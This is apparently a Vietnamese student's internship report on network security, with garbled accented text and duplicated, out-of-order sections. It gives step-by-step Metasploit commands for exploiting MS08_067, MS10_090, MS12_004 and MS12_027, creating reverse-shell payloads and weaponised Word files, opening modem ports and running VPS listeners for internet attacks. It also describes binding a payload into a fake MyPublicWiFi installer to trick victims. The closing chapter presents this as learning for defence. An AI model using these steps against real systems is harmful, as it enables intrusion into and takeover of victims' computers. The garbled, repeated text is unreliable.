Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
